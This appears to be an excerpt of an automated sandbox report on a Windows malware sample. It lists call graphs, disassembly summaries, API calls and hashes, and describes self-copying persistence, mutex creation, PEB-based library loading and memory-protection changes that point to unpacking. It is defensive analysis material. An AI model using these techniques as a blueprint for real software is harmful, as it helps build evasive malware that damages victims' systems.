1129 4029a0 1128->1129 1129->1102 1131 401d3b 1130->1131 1134 401d5c 1130->1134 1132 4029a9 2 API calls 1131->1132 1132->1134 1133 402e87 2 API calls 1135 401dc3 1133->1135 1134->1133 1155 401e6d 1134->1155 1136 402f5b 2 API calls 1135->1136 1137 401dce 1136->1137 1139 402e87 2 API calls 1137->1139 1137->1155 1138 4028d1 2 API calls 1158 401ed1 1138->1158 1140 401dee 1139->1140 1141 402f5b 2 API calls 1140->1141 1142 401df9 1141->1142 1145 402e87 2 API calls 1142->1145 1143 401f7b 1144 402966 2 API calls 1143->1144 1147 401fd7 1144->1147 1146 401e1e 1145->1146 1148 402f5b 2 API calls 1146->1148 1149 4028d1 2 API calls 1147->1149 1151 401e29 1148->1151 1150 402000 VirtualFree 1149->1150 1152 402e87 2 API calls 1151->1152 1151->1155 1153 401e62 1152->1153 1154 402f5b 2 API calls 1153->1154 1154->1155 1155->1138 1156 402e87 GetPEB LdrLoadDll 1156->1158 1157 402f5b GetPEB LdrLoadDll 1157->1158 1158->1143 1158->1156 1158->1157 1159 4028d1 2 API calls 1158->1159 1159->1158 1161 4017a7 GetClassNameA 1160->1161 1162 4017fa 1160->1162 1161->1162 1163 4017bf 1161->1163 1163->1162 1164 4017e9 SendMessageA 1163->1164 1164->1162 1166 401528 1165->1166 1167 40153b 7 API calls 1166->1167 1168 4015f3 GetMessageA TranslateMessage DispatchMessageA 1167->1168 1168->1168 1169 40161a 1170 401629 DefWindowProcA 1169->1170 1171 40163c 1169->1171 1172 40165d ExitProcess 1170->1172 1173 401ae1 4 API calls 1171->1173 1175 401648 1173->1175 1176 402e87 2 API calls 1175->1176 1177 401652 1176->1177 1178 402f5b 2 API calls 1177->1178 1178->1172 1179 40166b 1180 402c3b 1179->1180 1181 401692 CreateToolhelp32Snapshot 1180->1181 1182 4016a7 1181->1182 1187 40173d 1181->1187 1183 402e87 2 API calls 1182->1183 1184 4016d6 1183->1184 1185 402f5b 2 API calls 1184->1185 1186 4016e1 1185->1186 1186->1187 1188 402e87 2 API calls 1186->1188 1189 402f5b 2 API calls 1186->1189 1188->1186 1189->1186 1190 4030ac 1191 402c3b 1190->1191 1192 403115 wsprintfA 1191->1192 1193 403136 1192->1193 1194 402e87 2 API calls 1193->1194 1195 403150 1194->1195 1196 402f5b 2 API calls 1195->1196 1197 40315b 1196->1197 1198 402e87 2 API calls 1197->1198 1199 403172 1198->1199 1200 402f5b 2 API calls 1199->1200 1201 40317d 1200->1201 1202 4031ad 1201->1202 1203 4029a9 2 API calls 1201->1203 1204 402e87 2 API calls 1202->1204 1205 4031c2 1203->1205 1206 4031e5 1204->1206 1207 402e87 2 API calls 1205->1207 1208 402f5b 2 API calls 1206->1208 1209 4031cd 1207->1209 1211 4031f0 1208->1211 1210 402f5b 2 API calls 1209->1210 1210->1202 1212 40325a 1211->1212 1214 402e87 2 API calls 1211->1214 1213 402966 2 API calls 1212->1213 1215 403265 1213->1215 1216 403224 1214->1216 1217 402f5b 2 API calls 1216->1217 1218 40322f 1217->1218 1218->1212 1219 4028d1 2 API calls 1218->1219 1219->1212 1220 401f7d 1228 401f02 1220->1228 1221 401f7b 1222 402966 2 API calls 1221->1222 1223 401fd7 1222->1223 1224 4028d1 2 API calls 1223->1224 1225 402000 VirtualFree 1224->1225 1226 402e87 GetPEB LdrLoadDll 1226->1228 1227 402f5b GetPEB LdrLoadDll 1227->1228 1228->1221 1228->1226 1228->1227 1229 4028d1 2 API calls 1228->1229 1229->1228

                                              Callgraph

                                              • Executed
                                              • Not Executed
                                              • Opacity -> Relevance
                                              • Disassembly available
                                              callgraph 0 Function_00402E43 1 Function_00405D44 2 Function_004057C4 3 Function_00405348 4 Function_0040304E 5 Function_0040574E 6 Function_00405F4E 7 Function_00405951 8 Function_004028D1 15 Function_00402F5B 8->15 40 Function_00402E87 8->40 9 Function_00402D55 51 Function_00402D9B 9->51 10 Function_00405ED6 11 Function_004057D7 12 Function_00402E5A 13 Function_00405CDA 14 Function_0040565B 15->9 15->15 15->40 68 Function_00402C3B 15->68 16 Function_0040565F 17 Function_00401AE1 17->15 17->40 17->68 18 Function_00402B63 18->12 19 Function_00402966 19->15 19->40 20 Function_00405867 21 Function_00402DE8 22 Function_00405F69 23 Function_0040526A 24 Function_0040556A 25 Function_0040166B 25->0 25->9 25->15 25->40 25->51 59 Function_00402E2B 25->59 25->68 26 Function_004051ED 27 Function_004054ED 28 Function_0040576E 29 Function_004056F5 30 Function_00402D78 30->21 31 Function_00401F7D 31->8 31->15 31->19 36 Function_00402B83 31->36 31->40 50 Function_00402D1B 31->50 32 Function_004056FF 33 Function_0040177F 33->9 33->68 34 Function_00401000 34->8 34->12 34->15 34->17 34->18 34->19 34->21 34->30 34->33 39 Function_00401806 34->39 34->40 41 Function_00402E07 34->41 43 Function_0040150C 34->43 34->50 53 Function_00402025 34->53 57 Function_004029A9 34->57 58 Function_00401BAB 34->58 34->68 35 Function_00405601 37 Function_00405A05 38 Function_00405285 39->0 39->15 39->40 39->68 40->15 40->40 67 Function_00402DB6 40->67 40->68 42 Function_0040150A 43->68 44 Function_00405F91 45 Function_00405115 46 Function_00405415 47 Function_00401616 48 Function_00405E99 49 Function_0040161A 49->15 49->17 49->40 52 Function_00405E1C 53->0 53->4 53->8 53->12 53->15 53->17 53->19 53->36 53->39 53->40 53->41 53->50 53->51 53->57 53->59 53->67 53->68 70 Function_00401CBF 53->70 54 Function_00405825 55 Function_004052A7 56 Function_004055A8 57->0 57->15 57->40 57->41 57->51 57->57 57->68 58->15 58->40 58->68 60 Function_004050AB 61 Function_004053AB 62 Function_004030AC 62->8 62->15 62->19 62->40 62->41 62->51 62->57 62->68 63 Function_00405630 64 Function_00405A32 65 Function_00405733 66 Function_00405EB4 67->51 68->51 68->59 69 Function_00405BBB 70->8 70->15 70->19 70->36 70->40 70->50 70->57 71 Function_00405ABF

                                              Executed Functions

                                              Function 00401000 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 326filesleepsynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 401000-401013 1 401015-40101f 0->1 2 40104d-4010a4 CreateThread SetUnhandledExceptionFilter GetModuleFileNameW call 401bab 0->2 1->2 4 401021-401048 call 402e5a call 402b63 call 402c3b 1->4 7 4010c0-40111d call 401ae1 * 2 EnumWindows call 402c3b GetEnvironmentVariableW call 402c3b 2->7 8 4010a6-4010ba call 402d78 2->8 4->2 28 401123-401143 call 402de8 call 402e5a 7->28 29 4011cb-4011e7 call 402de8 7->29 8->7 17 401288-4012e3 call 402e87 call 402f5b call 402c3b CreateMutexW call 402e87 call 402f5b 8->17 54 403271-403273 ExitProcess 17->54 55 4012e9-40130c call 402e87 call 402f5b 17->55 45 401146-401153 call 402e5a 28->45 29->28 37 4011ed-401204 call 402de8 29->37 37->28 47 40120a-401210 37->47 53 401155-401175 CreateDirectoryW call 402e5a 45->53 47->28 49 401216-40121c 47->49 49->28 52 401222-401228 49->52 52->28 56 40122e 52->56 64 401178-401185 call 402e5a 53->64 77 401316-401381 call 402e87 call 402f5b call 402e87 call 402f5b call 402c3b call 402e07 55->77 59 401233-401249 CopyFileW 56->59 62 401253-401283 call 401806 call 402e87 call 402f5b Sleep 59->62 63 40124b-40124c 59->63 62->54 63->59 66 40124e 63->66 72 401187-4011c6 CopyFileW 64->72 66->28 72->62 93 401383-401389 77->93 94 40138b-4013ae call 4029a9 call 402e87 call 402f5b 77->94 95 4013b0-4013d9 call 402e87 call 402f5b call 402c3b 93->95 94->95 109 4014bc-4014c6 95->109 110 4013df-40140e call 402e87 call 402f5b 95->110 111 4014d4 109->111 112 4014c8-4014d2 109->112 110->109 124 401414-40146f call 4028d1 call 402d1b call 402e87 call 402f5b 110->124 115 4014de-4014e4 call 402966 111->115 112->115 118 4014e9-401505 call 402e87 call 402f5b 115->118 118->77 124->109 136 401471-40149c call 402e87 call 402f5b 124->136 136->109 142 40149e-4014ba call 402966 call 402025 136->142 142->118
                                              APIs
                                              • CreateThread.KERNEL32(00000000,00000000,0040150C,0040161A,00000000,00000000), ref: 0040105F
                                              • SetUnhandledExceptionFilter.KERNEL32(004030AC), ref: 00401069
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 00401086
                                              • EnumWindows.USER32(0040177F,00000000), ref: 004010DF
                                              • GetEnvironmentVariableW.KERNEL32(004056A9,?,00000200,004056A9,00000020,00000000,004056D3,00000018,004056EB,00000014,004056D3,00000018,00000000,?,00000200), ref: 00401103
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000018,00000004,?,?,004056A9,00000020,00000000,004056A9,?,00000200,004056A9,00000020,00000000,004056D3), ref: 00401169
                                              • CopyFileW.KERNEL32(?,00000000,00000000,00000018,00000004,?,00000000,00000018,00000004,?,?,004056A9,00000020,00000000,004056A9,?), ref: 004011C1
                                              • CopyFileW.KERNEL32(?,00000000,00000000,00000000,?,004056A9,00000020,00000000,004056A9,?,00000200,004056A9,00000020,00000000,004056D3,00000018), ref: 00401242
                                              • Sleep.KERNELBASE(00000000,00405B44,00405AC4,0000EA60,004056D3,00000018,00000000,00000000,?,00000000,00000000,00000018,00000004,?,00000000,00000018), ref: 00401281
                                              • ExitProcess.KERNEL32(00000000), ref: 00403273
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CreateMutexW.KERNEL32(00000000,00000001,?,004056D3,00000018,?), ref: 004012C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateFile$Copy$DirectoryEnumEnvironmentExceptionExitFilterLoadModuleMutexNameProcessSleepThreadUnhandledVariableWindows
                                              • String ID: $Q@
                                              • API String ID: 3972995194-360258219
                                              • Opcode ID: 54f1d0a6dafee84de2427135a9a86a49a3110046db74b429febdf25425549f34
                                              • Instruction ID: cc4bf317252f9d27aff18173934a3b15bb7c1e37340d92c10a98cdc1ef9be28b
                                              • Opcode Fuzzy Hash: 54f1d0a6dafee84de2427135a9a86a49a3110046db74b429febdf25425549f34
                                              • Instruction Fuzzy Hash: B6B17470B8071979EF2077A18D47F9B65689F44708F2004BBB648B91D2CAFC5A419E9F
                                              Function 00401806 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211timeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CoInitialize.OLE32(00000000,004058EB,004058E1,00000000,-000007A4,?,00000003), ref: 00401829
                                              • GetSystemTime.KERNEL32(?,?,00000030), ref: 004019AC
                                              • CoUninitialize.COMBASE(00000000,00405909,004058E1), ref: 00401AD8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: InitializeLoadSystemTimeUninitialize
                                              • String ID: 0
                                              • API String ID: 4010867600-4108050209
                                              • Opcode ID: 79196b38ae3dca0219ffd21b81f0e2c5a14f33ee1226952f0e2f1d32b26faef6
                                              • Instruction ID: 077a5f290c5d61bafa42f2fdca176d6a9dd12f8454b87f0f8003aed6a7cfb27e
                                              • Opcode Fuzzy Hash: 79196b38ae3dca0219ffd21b81f0e2c5a14f33ee1226952f0e2f1d32b26faef6
                                              • Instruction Fuzzy Hash: 33812EB5600218AFDB10EB94CD85FDA73B8EF48308F5044A6E608E72D1D779AE85CF59
                                              Function 00402E87 Relevance: 1.6, APIs: 1, Instructions: 69libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 402e87-402eb6 call 402c3b GetPEB 273 402eb9-402ebe 270->273 274 402ec0-402ec4 273->274 275 402f51 274->275 276 402eca-402ed0 274->276 277 402f54-402f58 275->277 278 402ed2-402ed5 276->278 279 402ed7 276->279 280 402eda-402edd 278->280 279->280 281 402ee6-402eea 280->281 282 402edf-402ee2 280->282 281->274 282->281 283 402ee4-402eee 282->283 283->273 285 402ef0-402f4f call 402db6 call 402e87 call 402f5b LdrLoadDll 283->285 285->277
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: eff3988bc0eb4de1d54521272dbd663abbecf0da9700c9a70d5690b23da7ae67
                                              • Instruction ID: 6746bf7ef4ffec5dc024189cfe666cad6ddc711dd7aeea948ca1f544c41ca62d
                                              • Opcode Fuzzy Hash: eff3988bc0eb4de1d54521272dbd663abbecf0da9700c9a70d5690b23da7ae67
                                              • Instruction Fuzzy Hash: F721F8759042189BCB20DB54CD48BCAB7B8EF15314F1041B7E984B72C1D3B8AA82CF99
                                              Function 0040150C Relevance: 15.1, APIs: 10, Instructions: 72windowregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,Function_000056FF,00000009,?,00405708,0000000A,?), ref: 0040153D
                                              • LoadIconA.USER32(00000000,00007F04), ref: 0040157D
                                              • LoadCursorA.USER32(00000000,00007F01), ref: 0040158C
                                              • RegisterClassA.USER32(00000000), ref: 0040159F
                                              • ExitProcess.KERNEL32(00000080,?,?,00C80000,FFFFFC18,FFFFFC18,000001F4,00000096,00000000,00000000,?,00000000), ref: 004015D9
                                              • ShowWindow.USER32(?,00000001,00000080,?,?,00C80000,FFFFFC18,FFFFFC18,000001F4,00000096,00000000,00000000,?,00000000), ref: 004015E6
                                              • UpdateWindow.USER32(?), ref: 004015EE
                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004015FD
                                              • TranslateMessage.USER32(?), ref: 00401606
                                              • DispatchMessageA.USER32(?), ref: 0040160F
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Message$LoadWindow$ClassCursorDispatchExitHandleIconModuleProcessRegisterShowTranslateUpdate
                                              • String ID:
                                              • API String ID: 2466556465-0
                                              • Opcode ID: 52ed46de41349f3d582880e95edfe2d678f06aed16e7b33847e1eb2bed05ec98
                                              • Instruction ID: 38260ba289d654bb8fed106bd4b6289030b46a1fee283fad4cc1d6262141adf0
                                              • Opcode Fuzzy Hash: 52ed46de41349f3d582880e95edfe2d678f06aed16e7b33847e1eb2bed05ec98
                                              • Instruction Fuzzy Hash: E8212A70D45308BAEF50EFE5CC46FDDBABCAB04705F2040AAF604BA1C1D7B95A048B69
                                              Function 0040161A Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 207 40161a-401627 208 401629-40163a DefWindowProcA 207->208 209 40163c-40165f call 401ae1 call 402e87 call 402f5b 207->209 210 401664-401668 208->210 212 403271-403273 ExitProcess 209->212 210->212
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 00401635
                                              • ExitProcess.KERNEL32(00000000), ref: 00403273
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ExitProcProcessWindow
                                              • String ID:
                                              • API String ID: 86880500-0
                                              • Opcode ID: 0db0ace64051bc717b682083bd426630cc0a35c42dd1c87597c3ebb1dfd9902d
                                              • Instruction ID: 8ed47dd494637e04bbeb240371057fe848f802d8e13938514175256acfb159fd
                                              • Opcode Fuzzy Hash: 0db0ace64051bc717b682083bd426630cc0a35c42dd1c87597c3ebb1dfd9902d
                                              • Instruction Fuzzy Hash: EAE03775244215BBDE013FD69C46F5B3A18DB44759F104837B705740E285BE4512AA7E
                                              Function 00401BAB Relevance: 2.6, APIs: 2, Instructions: 92COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CoInitialize.OLE32(00000000,004058EB,004058E1,00000000), ref: 00401BD5
                                              • CoUninitialize.COMBASE(00000000,00405909,004058E1), ref: 00401CB3
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: InitializeLoadUninitialize
                                              • String ID:
                                              • API String ID: 3228517379-0
                                              • Opcode ID: 2026d87ce0fc0066690c3eafbda8d8e5190af650b7c640b24d7c5ce032ee966f
                                              • Instruction ID: e53a606a692811635fe40b20f348e9617a3a8a3f765bf8268464583007073160
                                              • Opcode Fuzzy Hash: 2026d87ce0fc0066690c3eafbda8d8e5190af650b7c640b24d7c5ce032ee966f
                                              • Instruction Fuzzy Hash: 16312C75640608AFDB10EB95CC85F9FB3BCEB48304F1045A6B608F31D1DAB9AA419F68
                                              Function 00401AE1 Relevance: 2.6, APIs: 2, Instructions: 67COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              • CoInitialize.OLE32(00000000,004058EB,004058E1,00000000), ref: 00401B04
                                              • CoUninitialize.COMBASE(00000000,00405909,004058E1), ref: 00401BA2
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: InitializeLoadUninitialize
                                              • String ID:
                                              • API String ID: 3228517379-0
                                              • Opcode ID: 8699d760873d2011b7bcdda1aef1fa91b68ec3378c32af1153d987c3fedd45c5
                                              • Instruction ID: b63da7821b3bd78901ee0d03bed2f3afbf60260133af94835a174438e475f7fe
                                              • Opcode Fuzzy Hash: 8699d760873d2011b7bcdda1aef1fa91b68ec3378c32af1153d987c3fedd45c5
                                              • Instruction Fuzzy Hash: EE114FB66406087ADA10F6E1CD4AF9F726CDB48708F204476B608F21C2DAB99E519E69

                                              Non-executed Functions

                                              Function 0040166B Relevance: 1.6, APIs: 1, Instructions: 79processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 593 40166b-4016a1 call 402c3b CreateToolhelp32Snapshot 596 401772-40177c 593->596 597 4016a7-4016e3 call 402e43 call 402e87 call 402f5b 593->597 605 40176a-40176c 597->605 605->596 606 4016e8-401711 call 402d9b call 402e2b 605->606 611 401721-401724 606->611 612 401713-401716 611->612 613 401726-40173b call 402d55 611->613 615 401720 612->615 616 401718-40171b 612->616 619 401749-401768 call 402e87 call 402f5b 613->619 620 40173d-401747 613->620 615->611 616->615 618 40171d 616->618 618->615 619->605 620->596
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,000000FF,?), ref: 00401696
                                                • Part of subcall function 00402E87: LdrLoadDll.NTDLL(00000000,00405844,00000000,00000000,?,?,?,?,?,000000FF,?), ref: 00402F47
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateLoadSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 291908380-0
                                              • Opcode ID: 7cb484f44f4f2ac094dc28ae1ce8c1ccb6d26d74b7766e19bd12f7139b2e2256
                                              • Instruction ID: 253468650f68ea59506e53e8194d7c382a21fc421dfc5e2cb0297ff1125e3e04
                                              • Opcode Fuzzy Hash: 7cb484f44f4f2ac094dc28ae1ce8c1ccb6d26d74b7766e19bd12f7139b2e2256
                                              • Instruction Fuzzy Hash: D92191719001196ADB21EBB1CD89FDEB6BCAB08314F6005B7F244B20D1D7B89B858F68
                                              Function 00402E5A Relevance: .0, Instructions: 23COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 799a4728681ba60eeb94c60f75fd4730c503bb4ef67aa5004236aa76b25f6b33
                                              • Instruction ID: 80d44e8b977b44856e8d19745a7f8469b4832bf1aa40be1deba1804620d7c2bf
                                              • Opcode Fuzzy Hash: 799a4728681ba60eeb94c60f75fd4730c503bb4ef67aa5004236aa76b25f6b33
                                              • Instruction Fuzzy Hash: 09D05EA73081152FB708504BAE078ABAA5EC2D26683089437B500C02A2F550DA4500B0
                                              Function 0040177F Relevance: 6.0, APIs: 4, Instructions: 43threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 505 40177f-4017a5 GetWindowThreadProcessId GetCurrentProcessId 506 4017a7-4017bd GetClassNameA 505->506 507 4017fa-401803 505->507 506->507 508 4017bf-4017e7 call 402c3b call 402d55 506->508 508->507 513 4017e9-4017f5 SendMessageA 508->513 513->507
                                              APIs
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00401795
                                              • GetCurrentProcessId.KERNEL32 ref: 0040179A
                                              • GetClassNameA.USER32(?,?,000000FF), ref: 004017B6
                                              • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 004017F5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Process$ClassCurrentMessageNameSendThreadWindow
                                              • String ID:
                                              • API String ID: 1760342835-0
                                              • Opcode ID: d5a2fe3926074b874b85c201b99420035db7baa3299ba758230e81be0e5195ca
                                              • Instruction ID: 5d5a6178dc5f0634159930b4a56eada182b2654b8324d09f66e59d4491047fc3
                                              • Opcode Fuzzy Hash: d5a2fe3926074b874b85c201b99420035db7baa3299ba758230e81be0e5195ca
                                              • Instruction Fuzzy Hash: 540181B55001197ADB20AA61DC82FEF7A6CAB00749F0000BB7709F60D1EAB49E429E6C
                                              Function 0040304E Relevance: 6.0, APIs: 4, Instructions: 36fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 514 40304e-403078 CreateFileA 515 4030a5-4030a9 514->515 516 40307a-4030a0 SetFilePointer WriteFile CloseHandle 514->516 516->515
                                              APIs
                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 0040306D
                                              • SetFilePointer.KERNEL32(?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000,?,?,00000003), ref: 00403084
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080,00000000), ref: 00403098
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,00000000,00000000,?,?,40000000,00000000,00000000,?,00000080), ref: 004030A0
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2379874764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_400000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandlePointerWrite
                                              • String ID:
                                              • API String ID: 3604237281-0
                                              • Opcode ID: 687355ab6ddc4e107ccd9487f6c68e3ea19a4e8ff17dce9f0f54723a7c8f560e
                                              • Instruction ID: 8f58c3df1896ff6b503c7d1ead60e913e467ede25dabb4556bff6f44759aa335
                                              • Opcode Fuzzy Hash: 687355ab6ddc4e107ccd9487f6c68e3ea19a4e8ff17dce9f0f54723a7c8f560e
                                              • Instruction Fuzzy Hash: 7CF05E32640208BAEF21AE95DC47FCE7F29EB04725F204166F710B80E0DB766B20A75C

                                              Execution Graph

                                              Execution Coverage:11.5%
                                              Dynamic/Decrypted Code Coverage:99.1%
                                              Signature Coverage:0%
                                              Total number of Nodes:319
                                              Total number of Limit Nodes:42
                                              execution_graph 55792 52bea68 55793 52beaac VirtualAlloc 55792->55793 55795 52beb19 55793->55795 55796 55473c0 55797 554740f NtProtectVirtualMemory 55796->55797 55799 5547487 55797->55799 55800 cad01c 55801 cad034 55800->55801 55802 cad08f 55801->55802 55804 52bdfb8 55801->55804 55805 52be011 55804->55805 55808 52be518 55805->55808 55806 52be046 55809 52be545 55808->55809 55810 52be6db 55809->55810 55813 52bd430 55809->55813 55810->55806 55815 52bd457 55813->55815 55817 52bd930 55815->55817 55818 52bd979 VirtualProtect 55817->55818 55820 52bd514 55818->55820 55820->55806 55855 cf6728 55856 cf6745 55855->55856 55858 cf6755 55856->55858 55861 52b876a 55856->55861 55865 52b6a97 55856->55865 55868 52b7621 55856->55868 55862 52b8789 55861->55862 55864 52bd430 VirtualProtect 55862->55864 55863 52b87b4 55864->55863 55867 52bd430 VirtualProtect 55865->55867 55866 52b01dc 55867->55866 55869 52b7640 55868->55869 55871 52bd430 VirtualProtect 55869->55871 55870 52b7667 55871->55870 55872 54570b2 55873 54570bc 55872->55873 55877 542c2d0 55873->55877 55884 542c2e0 55873->55884 55878 542c2f5 55877->55878 55891 542c6f7 55878->55891 55894 542c91d 55878->55894 55897 542cd5c 55878->55897 55901 542c728 55878->55901 55885 542c2f5 55884->55885 55887 542c6f7 10 API calls 55885->55887 55888 542c728 10 API calls 55885->55888 55889 542cd5c 10 API calls 55885->55889 55890 542c91d 10 API calls 55885->55890 55886 542c30b 55887->55886 55888->55886 55889->55886 55890->55886 55892 542c752 55891->55892 55904 542dc71 55892->55904 55895 542c785 55894->55895 55896 542dc71 10 API calls 55895->55896 55896->55895 55898 542cd66 55897->55898 55899 542c785 55897->55899 55900 542dc71 10 API calls 55899->55900 55900->55899 55902 542c752 55901->55902 55903 542dc71 10 API calls 55902->55903 55903->55902 55905 542dc95 55904->55905 55919 542de73 55905->55919 55923 542df8c 55905->55923 55927 542dcbf 55905->55927 55931 542dffe 55905->55931 55935 542de69 55905->55935 55939 542dff9 55905->55939 55943 542e20a 55905->55943 55947 542dd9a 55905->55947 55951 542e065 55905->55951 55955 542e0e4 55905->55955 55959 542e221 55905->55959 55963 542dcd0 55905->55963 55906 542dcb7 55906->55892 55921 542dd35 55919->55921 55920 542e06a 55920->55906 55921->55920 55967 542e620 55921->55967 55924 542dd35 55923->55924 55925 542e06a 55924->55925 55926 542e620 10 API calls 55924->55926 55925->55906 55926->55924 55929 542dcd0 55927->55929 55928 542e06a 55928->55906 55929->55928 55930 542e620 10 API calls 55929->55930 55930->55929 55933 542dd35 55931->55933 55932 542e06a 55932->55906 55933->55932 55934 542e620 10 API calls 55933->55934 55934->55933 55937 542dd35 55935->55937 55936 542e06a 55936->55906 55937->55936 55938 542e620 10 API calls 55937->55938 55938->55937 55940 542e06a 55939->55940 55941 542dd35 55939->55941 55940->55906 55941->55940 55942 542e620 10 API calls 55941->55942 55942->55941 55945 542dd35 55943->55945 55944 542e06a 55944->55906 55945->55944 55946 542e620 10 API calls 55945->55946 55946->55945 55948 542dd35 55947->55948 55949 542e06a 55948->55949 55950 542e620 10 API calls 55948->55950 55949->55906 55950->55948 55952 542e06a 55951->55952 55953 542dd35 55951->55953 55952->55906 55953->55952 55954 542e620 10 API calls 55953->55954 55954->55953 55957 542dd35 55955->55957 55956 542e06a 55956->55906 55957->55956 55958 542e620 10 API calls 55957->55958 55958->55957 55960 542dd35 55959->55960 55961 542e06a 55960->55961 55962 542e620 10 API calls 55960->55962 55961->55906 55962->55960 55965 542dcfd 55963->55965 55964 542e06a 55964->55906 55965->55964 55966 542e620 10 API calls 55965->55966 55966->55965 55968 542e645 55967->55968 55997 55406d3 55968->55997 56002 55410ec 55968->56002 56007 55401ac 55968->56007 56012 554062c 55968->56012 56017 55408a1 55968->56017 56022 55403e1 55968->56022 56027 5541060 55968->56027 56032 5540220 55968->56032 56040 5540cbf 55968->56040 